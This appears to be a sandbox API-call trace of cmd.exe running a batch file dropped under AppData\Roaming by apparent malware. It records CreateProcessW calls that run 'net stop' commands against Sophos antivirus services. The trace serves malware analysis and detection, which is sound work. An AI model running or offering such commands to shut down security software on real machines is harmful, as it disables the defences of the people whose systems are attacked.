lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.232] GetLastError () returned 0x2 [0210.232] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.232] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.233] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.233] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.233] GetLastError () returned 0x2 [0210.233] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.233] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.234] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.235] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0210.235] SetErrorMode (uMode=0x0) returned 0x1 [0210.235] GetProcessHeap () returned 0x3e0000 [0210.235] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0210.235] GetProcessHeap () returned 0x3e0000 [0210.235] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0210.235] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.235] GetProcessHeap () returned 0x3e0000 [0210.235] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0210.235] GetProcessHeap () returned 0x3e0000 [0210.235] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0210.236] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0210.236] GetProcessHeap () returned 0x3e0000 [0210.236] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0210.236] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.236] GetProcessHeap () returned 0x3e0000 [0210.236] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0210.236] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0210.236] GetProcessHeap () returned 0x3e0000 [0210.236] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0210.237] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.237] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.237] GetLastError () returned 0x2 [0210.237] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.238] GetLastError () returned 0x2 [0210.238] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.238] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0210.238] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.239] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.239] GetLastError () returned 0x2 [0210.239] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0210.239] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.240] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.240] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0210.240] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0210.240] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0210.241] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0210.241] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos File Scanner ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos File Scanner ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos File Scanner ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x5f0, dwThreadId=0x4a0)) returned 1 [0210.245] CloseHandle (hObject=0x78) returned 1 [0210.245] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0210.245] GetProcessHeap () returned 0x3e0000 [0210.245] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.245] GetEnvironmentStringsW () returned 0x3f8408* [0210.245] GetProcessHeap () returned 0x3e0000 [0210.245] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.245] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.245] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0210.405] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0210.405] CloseHandle (hObject=0x74) returned 1 [0210.405] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0210.405] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0210.405] GetProcessHeap () returned 0x3e0000 [0210.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.405] GetEnvironmentStringsW () returned 0x3f8408* [0210.405] GetProcessHeap () returned 0x3e0000 [0210.405] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.406] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.406] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.406] GetProcessHeap () returned 0x3e0000 [0210.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.406] GetEnvironmentStringsW () returned 0x3f8408* [0210.406] GetProcessHeap () returned 0x3e0000 [0210.406] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.406] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.406] GetProcessHeap () returned 0x3e0000 [0210.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0210.406] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0210.406] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.406] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0210.406] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.406] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0210.406] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.406] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0210.407] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.407] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0210.407] SetConsoleInputExeNameW () returned 0x1 [0210.407] GetConsoleOutputCP () returned 0x1b5 [0210.407] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0210.407] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0210.408] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0210.408] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.408] SetFilePointer (in: hFile=0x74, lDistanceToMove=4776, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12a8 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbaf0 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0210.408] GetProcessHeap () returned 0x3e0000 [0210.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0210.408] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.408] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a8 [0210.408] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x619, lpOverlapped=0x0) returned 1 [0210.409] SetFilePointer (in: hFile=0x74, lDistanceToMove=4808, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12c8 [0210.409] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=32, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos AgentΓÇ¥ /y\r\nServiceΓÇ¥ /y\r\n¥ /y\r\nures\r\nnded\r\n") returned 32 [0210.409] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.409] GetFileType (hFile=0x74) returned 0x1 [0210.409] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.409] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12c8 [0210.409] GetProcessHeap () returned 0x3e0000 [0210.409] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0210.409] GetProcessHeap () returned 0x3e0000 [0210.409] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0210.412] _tell (_FileHandle=3) returned 4808 [0210.412] _close (_FileHandle=3) returned 0 [0210.412] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0210.412] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0210.412] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0210.413] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0210.413] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0210.413] _wcsicmp (_String1="net", _String2="CD") returned 11 [0210.413] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0210.413] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0210.413] _wcsicmp (_String1="net", _String2="REN") returned -4 [0210.413] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0210.413] _wcsicmp (_String1="net", _String2="SET") returned -5 [0210.413] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0210.413] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0210.413] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0210.413] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0210.413] _wcsicmp (_String1="net", _String2="MD") returned 1 [0210.413] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0210.413] _wcsicmp (_String1="net", _String2="RD") returned -4 [0210.413] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0210.413] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0210.413] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0210.413] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0210.413] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0210.413] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0210.413] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0210.413] _wcsicmp (_String1="net", _String2="VER") returned -8 [0210.413] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0210.413] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0210.413] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0210.413] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0210.413] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0210.413] _wcsicmp (_String1="net", _String2="START") returned -5 [0210.413] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0210.413] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0210.413] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0210.413] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0210.413] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0210.413] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0210.413] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0210.413] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0210.413] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0210.413] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0210.414] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0210.414] SetErrorMode (uMode=0x0) returned 0x1 [0210.414] GetProcessHeap () returned 0x3e0000 [0210.414] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0210.414] GetProcessHeap () returned 0x3e0000 [0210.414] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0210.414] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.414] GetProcessHeap () returned 0x3e0000 [0210.414] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0210.414] GetProcessHeap () returned 0x3e0000 [0210.414] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0210.415] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0210.415] GetProcessHeap () returned 0x3e0000 [0210.415] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0210.415] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.415] GetProcessHeap () returned 0x3e0000 [0210.415] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0210.415] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0210.415] GetProcessHeap () returned 0x3e0000 [0210.415] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0210.416] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.416] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.416] GetLastError () returned 0x2 [0210.417] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.417] GetLastError () returned 0x2 [0210.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.418] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.418] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.418] GetLastError () returned 0x2 [0210.418] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.419] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.419] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.420] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0210.420] SetErrorMode (uMode=0x0) returned 0x1 [0210.420] GetProcessHeap () returned 0x3e0000 [0210.420] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0210.420] GetProcessHeap () returned 0x3e0000 [0210.420] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0210.420] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.420] GetProcessHeap () returned 0x3e0000 [0210.420] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0210.420] GetProcessHeap () returned 0x3e0000 [0210.420] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0210.421] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0210.421] GetProcessHeap () returned 0x3e0000 [0210.421] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0210.421] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.421] GetProcessHeap () returned 0x3e0000 [0210.421] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0210.421] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0210.421] GetProcessHeap () returned 0x3e0000 [0210.421] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0210.421] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.422] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.422] GetLastError () returned 0x2 [0210.422] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.422] GetLastError () returned 0x2 [0210.423] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.423] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.423] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.424] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.424] GetLastError () returned 0x2 [0210.424] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.424] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.425] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.425] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0210.425] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0210.425] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0210.425] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0210.425] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos AgentΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos AgentΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, 